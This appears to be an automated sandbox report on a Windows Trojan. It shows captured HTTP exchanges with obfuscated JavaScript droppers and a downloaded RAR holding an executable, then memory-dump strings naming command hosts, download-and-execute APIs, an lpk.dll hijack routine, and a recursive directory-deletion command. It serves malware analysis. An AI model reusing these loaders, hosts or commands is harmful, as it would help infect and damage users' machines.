ssfwkey=actzmz..<script>function vvhxnCX(jNjP){var m;var T;m="";for(var v=0;v<jNjP.length;v ){T=jNjP.charCodeAt(v)^77;m =String.fromCharCode(T^76);}return m;}function aswkdKO(){var r="46,62,114,114,103,118,106,100,120,60,120,56,107,56,53";return eval("String.fromCharCode(" r ")");}function mcjwbAN(){var r="107,53,104,52,53";return eval("String.fromCharCode(" r ")");}function mhdvkAT(){var uNlD = document.getElem
<<< skipped >>>
GET /.........rar?rhdkm HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.30wz.com
Connection: Keep-Alive
HTTP/1.0 200 OK
Content-Type: text/html
Content-Length: 82
Pragma: no-cache
Cache-control: no-store
<html><body><script>var bo="/........",co="djfz2",fo,do_=new Array(),eo;function zo(ao){for(fo=0;fo<eo.length;fo )do_[fo]=eo.charCodeAt(fo);fo=51;do{if(fo<4)break;do_[fo]=((do_[fo] do_[fo-1])&0xff)^94;fo--;}while(true);fo="fo=2;do{do_[fo]=(do_[fo]-do_[fo 1])&0xff;}while( fo<=50);";eval(fo);fo="fo=2;while(true){if(fo>49)break;do_[fo]=((~do_[fo])&0xff)^112;do_[fo]=(-do_[fo])&0xff;fo ;}";eval(fo);eo="";for(fo=1;fo<do_.length-1;fo )if(fo%6)eo =String.fromCharCode(do_[fo]^ao);fo=eval;fo(eo);}eo="_\x95\xb7\xbd\xdf\xb4\xdb].\x1az\x16j\xbf\x1c\xe2\x16\xde\x13\xc3\xc1\xd4\xbd\x8c\x8a\xedC\xee5\xeb\xa1\xa7\xa2\x9e\xd9\x96\xd7\x9e\x88W{L\x9f[\x97QA\xffx\xcfE\x9a\x8d4";zo(226);</script><script>var u=2;for(;u==1;u );</script><br><br><br><center><h3><p>..............................JavaScript</p></h3></center></body></html>HTTP/1.0 200 OK..Content-Type: text/html..Content-Length: 826.Pragma: no-cache..Cache-control: no-store..<html><body><script>var bo="/........",co="djfz2",fo,do_=new Array(),eo;function zo(ao){for(fo=0;fo<eo.length;fo )do_[fo]=eo.charCodeAt(fo);fo=51;do{if(fo<4)break;do_[fo]=((do_[fo] do_[fo-1])&0xff)^94;fo--;}while(true);fo="fo=2;do{do_[fo]=(do_[fo]-do_[fo 1])&0xff;}while( fo<=50);";eval(fo);fo="fo=2;while(true){if(fo>49)break;do_[fo]=((~do_[fo])&0xff)^112;do_[fo]=(-do_[fo])&0xff;fo ;}";eval(fo);eo="";for(fo=1;fo<do_.length-1;fo )if(fo%6)eo =Strin
<<< skipped >>>
GET /.........rar?rqrkm HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.30wz.com
Connection: Keep-Alive
HTTP/1.0 200 OK
Content-Type: text/html
Content-Length: 85
Pragma: no-cache
Cache-control: no-store
<html><body><script>var it="/........",jt="djfz2",mt,kt=new Array(),lt;function gt(ht){for(mt=0;mt<lt.length;mt )kt[mt]=lt.charCodeAt(mt);mt=49;do{if(mt<3)break;kt[mt]=((kt[mt] kt[mt-1])&0xff)^131;mt--;}while(true);for(mt=51;;){if(mt<1)break;kt[mt]=(kt[mt] kt[mt-1])&0xff;mt--;}mt="mt=49;do{kt[mt]=((((((kt[mt]-kt[mt-1])&0xff) 208)&0xff)<<7)&0xff)|(((((kt[mt]-kt[mt-1])&0xff) 208)&0xff)>>1);}while(--mt>=2);";eval(mt);lt="";for(mt=1;mt<kt.length-1;mt )if(mt%6)lt =String.fromCharCode(kt[mt]^ht);eval("mt=eval;mt(lt);");}lt="\x1a\xa3\x91\x0e\x8f\x85 \xa1\xfbA\xd8\xe9\x1b/\x88;\xf1I\xf0kG\xbf\xe8\x1d\xc75V/\xfb\xa7\x85\xbc\x19\xc7\x83\xde\xf1w\xc74\x91\x0f\xc6O\x17\x97\xf0I\x9b\x9d&z\xbe\x91";gt(202);</script><script>var u=2;for(;u==1;u );</script><br><br><br><center><h3><p>..............................JavaScript</p></h3></center></body></html>..
GET /.........rar?rbrkm HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 180.ghyyy.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: safeshield/v2
Content-Length: 768
Content-Type: text/html; charset=gb2312
Pragma: no-cache
Cache-control: no-store
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Connection: Close
Set-Cookie: ssfwkey=actzmz
<script>function rrxbwVS(){var y="46,62,114,114,103,118,106,100,120,60,120,56,107,56,53";return eval("String.fromCharCode(" y ")");}function fykzrDK(tIzM){var b;var G;b="";for(var a=0;a<tIzM.length;a ){G=tIzM.charCodeAt(a)^15;b =String.fromCharCode(G^14);}return b;}function fbhvhWI(){var cEmV = document.getElementById("pVoM").value;var qPhY=rrxbwVS();window.location=fykzrDK(qPhY) cEmV;}function sgwdvJF(){var y="107,53,104,52,53";return eval("String.fromCharCode(" y ")");}</script><html><br><br><br><center><h3><font color="#3C3C3C">..............:</font><font color="blue"><script>var cAtE=sgwdvJF();document.write(fykzrDK(cAtE));</script> </font><input id="pVoM"> <input type=button value="................" onmouseup="fbhvhWI()"><br><br></h3><center></html>HTTP/1.1 200 OK..Server: safeshield/v2..Content-Length: 753..Content-Type: text/html; charset=gb2312..Pragma: no-cache..Cache-control: no-store..Expires: Thu, 01 Dec 1994 16:00:00 GMT..Connection: Close..Set-Cookie: ssfwkey=actzmz..<script>function nwcznTK(){var x="16,0,76,76,89,72,84,90,70,2,70,6,85,6,11";return eval("String.fromCharCode(" x ")");}function vzhssNW(){var kGnY = document.getElementById("rRaS").value;var gYgG=nwcznTK();window.location=twxhsZL(gYgG) kGnY;}function twxhsZL(mOjI){var s;var X;s="";for(var a=0;a<mOjI.length;a ){X=mOjI.charCodeAt(a)^32;s =String.fromCharCode(X^31);}return s;}function cgtziVX(){va
<<< skipped >>>
GET /.........rar?rqckm HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 180.ghyyy.com
Connection: Keep-Alive
Cookie: ssfwkey=actzmz
HTTP/1.1 200 OK
Server: safeshield/v2
Content-Length: 768
Content-Type: text/html; charset=gb2312
Pragma: no-cache
Cache-control: no-store
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Connection: Close
Set-Cookie: ssfwkey=actzmz
<script>function jvlloAB(iWlZ){var e;var X;e="";for(var m=0;m<iWlZ.length;m ){X=iWlZ.charCodeAt(m)^17;e =String.fromCharCode(X^16);}return e;}function fedavTX(){var k="46,62,114,114,103,118,106,100,120,60,120,56,107,56,53";return eval("String.fromCharCode(" k ")");}function mfofrCD(){var eBqV = document.getElementById("jPlK").value;var xCeM=fedavTX();window.location=jvlloAB(xCeM) eBqV;}function nzrqhXY(){var k="107,53,104,52,53";return eval("String.fromCharCode(" k ")");}</script><html><br><br><br><center><h3><font color="#3C3C3C">..............:</font><font color="blue"><script>var yGiK=nzrqhXY();document.write(jvlloAB(yGiK));</script> </font><input id="jPlK"> <input type=button value="................" onmouseup="mfofrCD()"><br><br></h3><center></html>..
GET /.........rar?rbrkm HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.86jfw.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Length: 9337155
Content-Type: application/octet-stream
Last-Modified: Sun, 16 Nov 2014 12:36:11 GMT
Accept-Ranges: bytes
ETag: "7cee72e7991d01:29b"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 17 Nov 2014 12:11:12 GMT
Connection: keep-alive
Rar!.....s...........Zt..@..x.. .....Y....pE.3.. ............exe..j"^yh$.f..exe...L-.....X.P......8....y8..n..t.....Gt...d..?%...../.B&........k;...x.. .....>......x.....~?.4v.4..#$~....B. 3..k{c#z.P...[[c.....{.X.7........."..../.$]..y.6.....o..L.....Z..[E.2....:.s.V.$...D..1...../c._.;j[.2..mK........z#..........e'..m.....?..{3./.W...SP..'...~.....s........h...f...\..A..G........?.V.....a....c.........O....A/....P...5....._......V.........#.W..&. ........n...7...........J....t.......0..............'T2..O`...Eo..].U.......5%o.L...>*.h...N.^..C.b.\T`.x ..........[XW`......B....8n...<a.x.....,..Az.."CW..^MD...-.F.....q... ....;.Z...@.....;.. ....U...O.}o...2.@.(...M2..k.. o.n.{.^..f7..9......T.BqO....s..@..&.ou.............cOy&.....W,.j4.......g..'..<...........B8.)..$IH}Iw:.w...@...l.....q.GE]a...c....-fT_p"b#6...._>>.tl_.d.....'.sy.#...;.....5..<....0.....`........8T....e6.e.52.....LG....5..Z...y"RU..|...{6........g..H.l~.C{.....o.........@...3.^m.7.St..j*..:...3.........W"o-..c...N...s.R....{C..... .WrP......!.dbJ.... .K:.w...m........Y.\....u.n..b.=.".....h....p.....7|2.t....n....op...[..s!."....<|.s[...=T.X9q. `....9..-P&...g./. ..H6..h.r.>k...@.T#...Z...f../&?=...<...(...6UA8.iT..r..8....)...H6#....1..Zk~...?|....z#...zOv.....[....C...`q.y...4..c..B%]=#kR.<...._.P...7.........!........r........T(.(.$.M.{..}.|.. ..xfC4...W........*. ....L0...*F.|.......M_1..,Gy.Pf0._i._....._qD[=...CF.2#jFU..q.l.3.~..>....._.$....orY..h.")...."Z.K<..........;{K..a.l......v.i...d.|....r
<<< skipped >>>
GET /.........rar?rbrkm HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 180.ghyyy.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: safeshield/v2
Content-Length: 768
Content-Type: text/html; charset=gb2312
Pragma: no-cache
Cache-control: no-store
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Connection: Close
Set-Cookie: ssfwkey=actzmz
<script>function wrzdkIW(dSgS){var d;var T;d="";for(var u=0;u<dSgS.length;u ){T=dSgS.charCodeAt(u)^86;d =String.fromCharCode(T^85);}return d;}function apeuzOV(){var rEdS = document.getElementById("jNeM").value;var rExN=wlphoNK();window.location=wrzdkIW(rExN) rEdS;}function aipebBB(){var n="105,55,106,54,55";return eval("String.fromCharCode(" n ")");}function wlphoNK(){var n="44,60,112,112,101,116,104,102,122,62,122,58,105,58,55";return eval("String.fromCharCode(" n ")");}</script><html><br><br><br><center><h3><font color="#3C3C3C">..............:</font><font color="blue"><script>var cUsF=aipebBB();document.write(wrzdkIW(cUsF));</script> </font><input id="jNeM"> <input type=button value="................" onmouseup="apeuzOV()"><br><br></h3><center></html>HTTP/1.1 200 OK..Server: safeshield/v2..Content-Length: 768..Content-Type: text/html; charset=gb2312..Pragma: no-cache..Cache-control: no-store..Expires: Thu, 01 Dec 1994 16:00:00 GMT..Connection: Close..Set-Cookie: ssfwkey=actzmz..<script>function knhtiIU(kZaE){var y;var X;y="";for(var o=0;o<kZaE.length;o ){X=kZaE.charCodeAt(o)^38;y =String.fromCharCode(X^37);}return y;}function wocbkUA(){var jZfO = document.getElementById("gFuI").value;var cDgG=rfhtsNF();window.location=knhtiIU(cDgG) jZfO;}function xvggoOQ(){var b="105,55,106,54,55";return eval("String.fromCharCode(" b ")");}function rfhtsNF(){var b="44,60,112,112,101,1
<<< skipped >>>
GET /.........rar?rbbkm HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 180.ghyyy.com
Connection: Keep-Alive
Cookie: ssfwkey=actzmz
HTTP/1.1 200 OK
Server: safeshield/v2
Content-Length: 753
Content-Type: text/html; charset=gb2312
Pragma: no-cache
Cache-control: no-store
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Connection: Close
Set-Cookie: ssfwkey=actzmz
<script>function zrhbxSP(){var j="16,0,76,76,89,72,84,90,70,2,70,6,85,6,11";return eval("String.fromCharCode(" j ")");}function ibgnwDX(){var gWmA = document.getElementById("dLuC").value;var wBjA=zrhbxSP();window.location=cpwbpDX(wBjA) gWmA;}function cpwbpDX(dNsY){var z;var Q;z="";for(var o=0;o<dNsY.length;o ){Q=dNsY.charCodeAt(o)^32;z =String.fromCharCode(Q^31);}return z;}function adyufDW(){var j="85,11,86,10,11";return eval("String.fromCharCode(" j ")");}</script><html><br><br><br><center><h3><font color="#3C3C3C">..............:</font><font color="blue"><script>var gXoP=adyufDW();document.write(cpwbpDX(gXoP));</script> </font><input id="dLuC"> <input type=button value="................" onmouseup="ibgnwDX()"><br><br></h3><center></html>..
GET /.................rar?rbrkm HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.zz12320.com
Connection: Keep-Alive
HTTP/1.0 200 OK
Content-Type: text/html
Content-Length: 82
Pragma: no-cache
Cache-control: no-store
<html><body><br><br><br><center><h3><a href="#" onmouseup="ef(205)">..............</a></h3></center><script></script><script>var gf="/................",hf="yqjs1",kf,if_=new Array(),jf;function ef(ff){for(kf=0;kf<jf.length;kf )if_[kf]=jf.charCodeAt(kf);for(kf=49;kf>=2;kf--){if_[kf]=(~((((if_[kf]-78)&0xff) 252)&0xff))&0xff;}kf="kf=4;while(true){if(kf>51)break;if_[kf]=(if_[kf]-if_[kf 1])&0xff;kf ;}";eval(kf);kf=51;while(kf>=2){if_[kf]=((((((if_[kf]-if_[kf-1])&0xff)-142)&0xff)<<4)&0xff)|(((((if_[kf]-if_[kf-1])&0xff)-142)&0xff)>>4);kf--;}jf="";for(kf=1;kf<if_.length-1;kf )if(kf%7)jf =String.fromCharCode(if_[kf]^ff);eval("kf=eval");kf(jf);}jf="=\xba\xbf\xf7\xb57q\xe4\x9e$R8\x96L -\x07\x99\xf3\xea\x19\x90\xdc$\xf8\x98\xc1BL\xb2\xd5\x81\xb5r\x27t<Pl\xb0<\x01\xbe\x1f\x98\xea\xd9\xe1u\x05n\xa8\x9a";</script></body></html>HTTP/1.0 200 OK..Content-Type: text/html..Content-Length: 827.Pragma: no-cache..Cache-control: no-store..<html><body><br><br><br><center><h3><a href="#" onmouseup="ef(205)">..............</a></h3></center><script></script><script>var gf="/................",hf="yqjs1",kf,if_=new Array(),jf;function ef(ff){for(kf=0;kf<jf.length;kf )if_[kf]=jf.charCodeAt(kf);for(kf=49;kf>=2;kf--){if_[kf]=(~((((if_[kf]-78)&0xff) 252)&0xff))&0xff;}kf="kf=4;while(true){if(kf>51)break;if_[kf]=(if_
<<< skipped >>>
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
regsvr32.exe_1680:
.text
.text
`.data
`.data
.rsrc
.rsrc
msvcrt.dll
msvcrt.dll
ADVAPI32.dll
ADVAPI32.dll
KERNEL32.dll
KERNEL32.dll
NTDLL.DLL
NTDLL.DLL
USER32.dll
USER32.dll
ole32.dll
ole32.dll
regsvr32.pdb
regsvr32.pdb
_wcmdln
_wcmdln
RegCloseKey
RegCloseKey
RegOpenKeyExW
RegOpenKeyExW
Excessive # of DLL's on cmdline
Excessive # of DLL's on cmdline
5.1.2600.5512 (xpsp.080413-2105)
5.1.2600.5512 (xpsp.080413-2105)
REGSVR32.EXE
REGSVR32.EXE
Windows
Windows
Operating System
Operating System
5.1.2600.5512
5.1.2600.5512
Usage: regsvr32 [/u] [/s] [/n] [/i[:cmdline]] dllname
Usage: regsvr32 [/u] [/s] [/n] [/i[:cmdline]] dllname
Call DllInstall passing it an optional [cmdline]; when used with /u calls dll uninstall
Call DllInstall passing it an optional [cmdline]; when used with /u calls dll uninstall
Unrecognized flag: %1"Extra argument on command line: This command is only valid when an OLE Custom Control project is open.
Unrecognized flag: %1"Extra argument on command line: This command is only valid when an OLE Custom Control project is open.
LoadLibrary("%1") failed - ,%1 was loaded, but the %2 entry point was not found.
LoadLibrary("%1") failed - ,%1 was loaded, but the %2 entry point was not found.
%1 does not appear to be a .DLL or .OCX file.V%1 was loaded, but the %2 entry point was not found.
%1 does not appear to be a .DLL or .OCX file.V%1 was loaded, but the %2 entry point was not found.
OleUninitialize failed.["%1" is not an executable file and no registration
OleUninitialize failed.["%1" is not an executable file and no registration
svchost.exe_592:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
ADVAPI32.dll
ADVAPI32.dll
USER32.dll
USER32.dll
GET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htm
GET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htm
RegCloseKey
RegCloseKey
RegOpenKeyExA
RegOpenKeyExA
RegOpenKeyA
RegOpenKeyA
SHLWAPI.dll
SHLWAPI.dll
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
WS2_32.dll
WS2_32.dll
MSVCRT.dll
MSVCRT.dll
_acmdln
_acmdln
WinExec
WinExec
KERNEL32.dll
KERNEL32.dll
0.0.0.0
0.0.0.0
hXXp://VVV.mojimojimojimoji.com/fuy733.html
hXXp://VVV.mojimojimojimoji.com/fuy733.html
192.168.200.113:8080
192.168.200.113:8080
%u.%u.%u.%u
%u.%u.%u.%u
hra%u.dll
hra%u.dll
VVV.mojimojimojimoji.com:38774
VVV.mojimojimojimoji.com:38774
192.168.200.113:1050
192.168.200.113:1050
iexplore.exe
iexplore.exe
stf%c%c%c%c%c.exe
stf%c%c%c%c%c.exe
URLDownloadToFileA
URLDownloadToFileA
urlmon.dll
urlmon.dll
%c%c%c%c%c.exe
%c%c%c%c%c.exe
PlusCtrl.dll
PlusCtrl.dll
%c%c%c%c%c%c.exe
%c%c%c%c%c%c.exe
%u MB
%u MB
%u MHz
%u MHz
Windows NT
Windows NT
Windows 7
Windows 7
Windows 2008
Windows 2008
Windows Vista
Windows Vista
Windows 2003
Windows 2003
Windows XP
Windows XP
Windows 2000
Windows 2000
SOFTWARE\Microsoft\Windows NT\CurrentVersion
SOFTWARE\Microsoft\Windows NT\CurrentVersion
\Program Files\Internet Explorer\iexplore.exe
\Program Files\Internet Explorer\iexplore.exe
#0%s!
#0%s!
%s/%s
%s/%s
GET %s HTTP/1.1
GET %s HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)
User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)
Host: %s:%d
Host: %s:%d
Host: %s
Host: %s
User-Agent:Mozilla/5.0 (X11; U; Linux i686; en-US; re:1.4.0) Gecko/20080808 Firefox/%d.0
User-Agent:Mozilla/5.0 (X11; U; Linux i686; en-US; re:1.4.0) Gecko/20080808 Firefox/%d.0
Referer: hXXp://%s:80/hXXp://%s
Referer: hXXp://%s:80/hXXp://%s
%s %s%s
%s %s%s
User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)
User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)
User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
%d.%d.%d.%d
%d.%d.%d.%d
192.168.1.244
192.168.1.244
svchost.exe
svchost.exe
ntdll.dll
ntdll.dll
@.reloc
@.reloc
lpk.dll
lpk.dll
cmd /c RD /s /q "%s"
cmd /c RD /s /q "%s"
"%s" a -r -ep1"%s" "%s" "%s\lpk.dll"
"%s" a -r -ep1"%s" "%s" "%s\lpk.dll"
"%s" x "%s" *.exe "%s\"
"%s" x "%s" *.exe "%s\"
cmd /c %s vb "%s" lpk.dll|find /i "lpk.dll"
cmd /c %s vb "%s" lpk.dll|find /i "lpk.dll"
rar.exe
rar.exe
svchost.exe_592_rwx_00400000_0000C000:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
ADVAPI32.dll
ADVAPI32.dll
USER32.dll
USER32.dll
GET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htm
GET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htm
RegCloseKey
RegCloseKey
RegOpenKeyExA
RegOpenKeyExA
RegOpenKeyA
RegOpenKeyA
SHLWAPI.dll
SHLWAPI.dll
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
WS2_32.dll
WS2_32.dll
MSVCRT.dll
MSVCRT.dll
_acmdln
_acmdln
WinExec
WinExec
KERNEL32.dll
KERNEL32.dll
0.0.0.0
0.0.0.0
hXXp://VVV.mojimojimojimoji.com/fuy733.html
hXXp://VVV.mojimojimojimoji.com/fuy733.html
192.168.200.113:8080
192.168.200.113:8080
%u.%u.%u.%u
%u.%u.%u.%u
hra%u.dll
hra%u.dll
VVV.mojimojimojimoji.com:38774
VVV.mojimojimojimoji.com:38774
192.168.200.113:1050
192.168.200.113:1050
iexplore.exe
iexplore.exe
stf%c%c%c%c%c.exe
stf%c%c%c%c%c.exe
URLDownloadToFileA
URLDownloadToFileA
urlmon.dll
urlmon.dll
%c%c%c%c%c.exe
%c%c%c%c%c.exe
PlusCtrl.dll
PlusCtrl.dll
%c%c%c%c%c%c.exe
%c%c%c%c%c%c.exe
%u MB
%u MB
%u MHz
%u MHz
Windows NT
Windows NT
Windows 7
Windows 7
Windows 2008
Windows 2008
Windows Vista
Windows Vista
Windows 2003
Windows 2003
Windows XP
Windows XP
Windows 2000
Windows 2000
SOFTWARE\Microsoft\Windows NT\CurrentVersion
SOFTWARE\Microsoft\Windows NT\CurrentVersion
\Program Files\Internet Explorer\iexplore.exe
\Program Files\Internet Explorer\iexplore.exe
#0%s!
#0%s!
%s/%s
%s/%s
GET %s HTTP/1.1
GET %s HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
